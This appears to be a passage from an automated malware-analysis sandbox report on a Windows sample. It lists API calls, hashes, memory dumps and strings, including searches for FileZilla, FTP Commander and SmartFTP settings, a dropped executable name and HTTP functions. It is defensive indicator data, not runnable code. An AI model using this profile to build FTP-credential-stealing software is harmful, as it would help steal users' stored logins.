                  • SOFTWARE\smartftp\client 2.0\settings\backup, xrefs: 00405168
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: EnvironmentExpandOpenStrings
                  • String ID: SOFTWARE\smartftp\client 2.0\settings\backup$SOFTWARE\smartftp\client 2.0\settings\general\favorites$folder$personal favorites
                  • API String ID: 3923277744-821743658
                  • Opcode ID: 9c5624b750c48fe949610555ae12c1d7776d2d53775f7ef2d3d96991cebe07cb
                  • Instruction ID: 0454e2dbaba930a1c05830d090df37f1eb9a44f33d61805f8e12f109ce5a2445
                  • Opcode Fuzzy Hash: 9c5624b750c48fe949610555ae12c1d7776d2d53775f7ef2d3d96991cebe07cb
                  • Instruction Fuzzy Hash: 21213E71D00518ABDB10EB95DC41ADFB7BCEB44318F1084B7E514B2181EB389B49CFA9
                  APIs
                  • CoInitialize.OLE32(00000000), ref: 0040A0C0
                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
                  • CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: CreateHandleInitializeModuleWindow
                  • String ID: AtlAxWin$Shell.Explorer
                  • API String ID: 950422046-1300462704
                  • Opcode ID: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
                  • Instruction ID: 8885d0d040d3ab3e1edd42f45155a7fe84e7bff231f75e8e802cb7627400a982
                  • Opcode Fuzzy Hash: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
                  • Instruction Fuzzy Hash: 78118F30200200FFD320ABA6CC4CE6B7BBCEFCA711B240579F515EB291D7789801CA65
                  APIs
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,UniqueNum), ref: 00407E5C
                  • ReadFile.KERNEL32(?,00000064,00000000,00000000), ref: 00407E74
                    • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,?,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                    • Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: File$CreateModuleNamePointerRead
                  • String ID: UniqueNum$d$x
                  • API String ID: 1528952607-727609663
                  • Opcode ID: e781d678688d42d7516b702b2ceb6c7207e197dfbc75e9fa72b18e73f6410cb1
                  • Instruction ID: 0df55d11f519ebf6f0451cc58b4543fb7278309a9039aac926228ebb90f40a66
                  • Opcode Fuzzy Hash: e781d678688d42d7516b702b2ceb6c7207e197dfbc75e9fa72b18e73f6410cb1
                  • Instruction Fuzzy Hash: 5311A531D09308AADF109B61DD05BDB3B6AAB00324F218676E612F61E0E7749D44CBAE
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040AB93
                  • CharLowerW.USER32(?), ref: 0040ABA0
                  • GetCommandLineW.KERNEL32 ref: 0040ABC0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: CharCommandFileLineLowerModuleName
                  • String ID: /updatefile3$netprotdrvss.exe
                  • API String ID: 3118597399-3449771660
                  • Opcode ID: 61670428bc38f3e4eb0be7325e100114f65b6339bc855a7a328cdb887f7470a6
                  • Instruction ID: 1eba2a713c21f7c79877a49aa3ec6850c44e44909145826ab611dd80b60fa5a6
                  • Opcode Fuzzy Hash: 61670428bc38f3e4eb0be7325e100114f65b6339bc855a7a328cdb887f7470a6
                  • Instruction Fuzzy Hash: 41E09B3655021A5AD750FBB1DD07BA633ACFB01705F1049B6A246F10C0EE74D55D4F9D
                  APIs
                  • GetTickCount.KERNEL32 ref: 00409FCE
                  • GetTickCount.KERNEL32 ref: 00409FDE
                  • Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                  • DispatchMessageW.USER32(?), ref: 0040A009
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: CountMessageTick$DispatchPeekSleep
                  • String ID:
                  • API String ID: 4159783438-0
                  • Opcode ID: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
                  • Instruction ID: c0dc46c0c87f7bc49602bd7d2efae9f565a6f52602c3eafe7569a8fa2f6b8eea
                  • Opcode Fuzzy Hash: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
                  • Instruction Fuzzy Hash: 3F118671D103199ECB10AFF5CC8899F7BB9BB45314B144A7AE161F71E0C778CA118B1A
                  APIs
                  • GetTickCount.KERNEL32 ref: 00409F5B
                  • GetTickCount.KERNEL32 ref: 00409F5F
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
                  • DispatchMessageW.USER32(?), ref: 00409F80
                  • Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: CountMessageTick$DispatchPeekSleep
                  • String ID:
                  • API String ID: 4159783438-0
                  • Opcode ID: 57f1528c1cf960ce56ea9ee11f0e0f6d2bf2bfe74b8bc540e63205e3b9b5f8f9
                  • Instruction ID: 2f378a1af0056e794f94b22e0cd08b0b0b180d2e60cd5d2ebdc62f673b65dbb1
                  • Opcode Fuzzy Hash: 57f1528c1cf960ce56ea9ee11f0e0f6d2bf2bfe74b8bc540e63205e3b9b5f8f9
                  • Instruction Fuzzy Hash: D1F0C872D042149BD714B7F2DD09B7D76A89B45714F104A36F551F70D1CA7CCD148A58
                  APIs
                    • Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
                    • Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551
                    • Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5B
                    • Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5F
                    • Part of subcall function 00409F2B: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
                    • Part of subcall function 00409F2B: DispatchMessageW.USER32(?), ref: 00409F80
                    • Part of subcall function 00409F2B: Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D
                  • CharLowerW.USER32(?,?,?,00423DD4,?,00000001), ref: 00408751
                  • SysFreeString.OLEAUT32(?), ref: 0040875A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: CountInternetMessageTick$CharDispatchFreeLowerOpenOptionPeekSleepString
                  • String ID: http://$+@
                  • API String ID: 147727044-3628382792
                  • Opcode ID: 9b23303d6d649a5b53af45e4e478eedb481f7f5b730c679736d56125673815b3
                  • Instruction ID: 305e6509dfdc939f3ffb47eba37a7af79922f54013ecb7534e3961c93d2e4cc1
                  • Opcode Fuzzy Hash: 9b23303d6d649a5b53af45e4e478eedb481f7f5b730c679736d56125673815b3
                  • Instruction Fuzzy Hash: 4E41D5729002199BCF15AF66CD056EFBBB4FF44314F20447FE981B3292DB3889528B99
                  APIs
                  • SetFilePointer.KERNEL32(?,00000000,00000000,?,UniqueNum,00000000), ref: 00407E09
                  • WriteFile.KERNEL32(00000078,00000064,00000000,00000000), ref: 00407E20
                    • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,?,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                    • Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: File$CreateModuleNamePointerWrite
                  • String ID: UniqueNum$x
                  • API String ID: 594998759-2399716736
                  • Opcode ID: f714b27ee9317318c4b5ab7fa1cefed36b34d8c85c53bda1d1664fc5573218dc
                  • Instruction ID: 8c5cde1ed6458afa5e70834db293a7f07ca8c6efd1b8e13f0da2095665a79c5a
                  • Opcode Fuzzy Hash: f714b27ee9317318c4b5ab7fa1cefed36b34d8c85c53bda1d1664fc5573218dc
                  • Instruction Fuzzy Hash: F72129329002186BDF04AB74ED49DDF3B69EF44315F104636FA02E71E1E634D951C799
                  APIs
                  • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 0040413A
                    • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?), ref: 00408280
                    • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                    • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                    • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                    • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                    • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                    • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,00403736,?), ref: 0040BE4D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
                  • String ID: #$&$*filezilla*
                  • API String ID: 3438805939-758400021
                  • Opcode ID: b94badfc80f454930b4c4e7711f3c2cdfa3c780a60e708483a1590b16434435c
                  • Instruction ID: af0dd5899ef73ee7264a7e51d90439c8fcf38b6470501fb51340e8e2557856c3
                  • Opcode Fuzzy Hash: b94badfc80f454930b4c4e7711f3c2cdfa3c780a60e708483a1590b16434435c
                  • Instruction Fuzzy Hash: 8E1151B2901128BADB10EA92DC49EDF7BBCEF85304F00407AF605B6080E7385785CBE9
                  APIs
                  • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 00404AE5
                    • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?), ref: 00408280
                    • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                    • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                    • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                    • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                    • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                    • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,00403736,?), ref: 0040BE4D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
                  • String ID: #$&$ftp*commander*
                  • API String ID: 3438805939-1149875651
                  • Opcode ID: 5b274e86ecfa94f023ab10c4bc64147d8c024bc00b4ff254a4a9ffef51946c32
                  • Instruction ID: 4761086559ade70d73b1403ca51e5d3bc462c500c99379e4fd01d7d946a964d6
                  • Opcode Fuzzy Hash: 5b274e86ecfa94f023ab10c4bc64147d8c024bc00b4ff254a4a9ffef51946c32
                  • Instruction Fuzzy Hash: B61121B2901118BADB10AA92DC49EDF7F7CEF85704F00407AF609B6180E7799785CBA9
                  APIs
                  • SysFreeString.OLEAUT32(?), ref: 004094A9
                  • SysFreeString.OLEAUT32(?), ref: 004094AE
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: FreeString
                  • String ID: _blank$an.yandex.ru/count
                  • API String ID: 3341692771-25359924
                  • Opcode ID: 220b2bda2c3fa2e17afd3876e6e131a3eeacb4788efdd8cad2f7b8a0937d0ae5
                  • Instruction ID: 1eacecae91598e8b756cf85833a4a3bbf756f1dfdfc5fa02fd6c22f827bf3b29
                  • Opcode Fuzzy Hash: 220b2bda2c3fa2e17afd3876e6e131a3eeacb4788efdd8cad2f7b8a0937d0ae5
                  • Instruction Fuzzy Hash: 28015A35204114BBDB109FA6CD05D9B77A8EF85324724443BBC15E7291E779EE02CA69
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00001000,?,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                  • GetCurrentDirectoryW.KERNEL32(00001000,?,?,00407E44,00000001,UniqueNum), ref: 00407D15
                  • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: File$CreateCurrentDirectoryModuleName
                  • String ID: \merocz.xc6
                  • API String ID: 3818821825-505599559
                  • Opcode ID: 958115370d9fa0fe1f61a9c021a4e84f793f7b6e6975f338f53fe808b3c86dcf
                  • Instruction ID: bb9f2ddab4bab237696810683399403c99d26191ea9c434de7a02090ea9b9a12
                  • Opcode Fuzzy Hash: 958115370d9fa0fe1f61a9c021a4e84f793f7b6e6975f338f53fe808b3c86dcf
                  • Instruction Fuzzy Hash: DA01A231904224ABE7309B569C49FEB77ADEF85710F00447FB505F20D1D6749A80CAAA
                  APIs
                  • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Internet Explorer,00000000,00000001,00000000,?,?,00402C77), ref: 00406C91
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: Open
                  • String ID: Build$SOFTWARE\Microsoft\Internet Explorer$w,@
                  • API String ID: 71445658-3061378640
                  • Opcode ID: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                  • Instruction ID: 930cfdd3d9e2cf302383723a85cc45ac24d6ba1b6d45bcf7a76994dd36721e6e
                  • Opcode Fuzzy Hash: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                  • Instruction Fuzzy Hash: FBE08672664218FAEF009B929C07FDA77ACDB00758F20086AF502F10C1DAB5F714D6AC
                  APIs
                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                    • Part of subcall function 0040845D: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000008,00000000,?,?,004084C5,?,?,?,00000008,?,00403796,?), ref: 00408475
                    • Part of subcall function 0040845D: RegCloseKey.ADVAPI32(?,?,004084C5,?,?,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408484
                  • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408524
                  • GetProcessHeap.KERNEL32(00000000,00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408534
                  • HeapFree.KERNEL32(00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 0040853B
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: Heap$CloseEnvironmentExpandFreeOpenProcessQueryStringsValue
                  • String ID:
                  • API String ID: 3604167287-0
                  • Opcode ID: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
                  • Instruction ID: 704a8cbe2313c99ccb7bf4cac6d27c9c5720caa44ca6f9902b9fd9ccb38d811f
                  • Opcode Fuzzy Hash: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
                  • Instruction Fuzzy Hash: 0521C871900626BBDF205B748E45ABF3668EF05328F10063EF561F22D0EB758D508658
                  APIs
                  • CharLowerW.USER32(00408E44,00000000,00000000,?,00408E44,00408795), ref: 004095A4
                  • CharLowerW.USER32(00408795), ref: 004095D8
                  • SysFreeString.OLEAUT32(00408795), ref: 00409608
                  • SysFreeString.OLEAUT32(00408E44), ref: 0040960D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: CharFreeLowerString
                  • String ID:
                  • API String ID: 2335467167-0
                  • Opcode ID: a9b2d518bc86f0d25b60cd0557e0d7d5801712bcf914245b10683875f4897775
                  • Instruction ID: 6911929459278785efe31e607170db17e103bee024a9a22ae291265c1613d99e
                  • Opcode Fuzzy Hash: a9b2d518bc86f0d25b60cd0557e0d7d5801712bcf914245b10683875f4897775
                  • Instruction Fuzzy Hash: 20116D72D00108BBDB019F9ADC85B9E7BB8EF44305F1544BAE405F21A1D779AE409F44
                  APIs
                  • GetSystemTime.KERNEL32(?,00000000), ref: 004072F9
                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00407337
                  • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 00407341
                  • __aulldiv.LIBCMT ref: 00407359
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: Time$System$File$__aulldiv
                  • String ID:
                  • API String ID: 3735792614-0
                  • Opcode ID: 4f6d7255259d029fcefee0a6ef84dda989e1e538c9ce85064cb776bb0b095d3e
                  • Instruction ID: 0875687ad9f8fbdff1f190dbab39d4211c2ed1a8acd2afdabfbd9ccbaffc37b8
                  • Opcode Fuzzy Hash: 4f6d7255259d029fcefee0a6ef84dda989e1e538c9ce85064cb776bb0b095d3e
                  • Instruction Fuzzy Hash: 83011A66D2022DAACF00DBE5DD44CEFB7BCFF44344B04051AE901B3210E7B5A648CBA9
                  APIs
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004081A3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                  • String ID: -
                  • API String ID: 885266447-2547889144
                  • Opcode ID: 9768e3a2316649ce80f3092f0a8653cf88643bc84f5cb20062fd1d2db9b0b25f
                  • Instruction ID: cbf3f064ca1262f0759db58cdf0f181467b31290bd4ebff5f053a9a619aca6df
                  • Opcode Fuzzy Hash: 9768e3a2316649ce80f3092f0a8653cf88643bc84f5cb20062fd1d2db9b0b25f
                  • Instruction Fuzzy Hash: 58415D31D0422699CB2177B98E417BB61A9DF44758F1440BFF9C0B72C2EEBC5D8581AE
                  APIs
                  • SysAllocString.OLEAUT32(?), ref: 00409868
                  • SysAllocString.OLEAUT32(?), ref: 00409876
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: AllocString
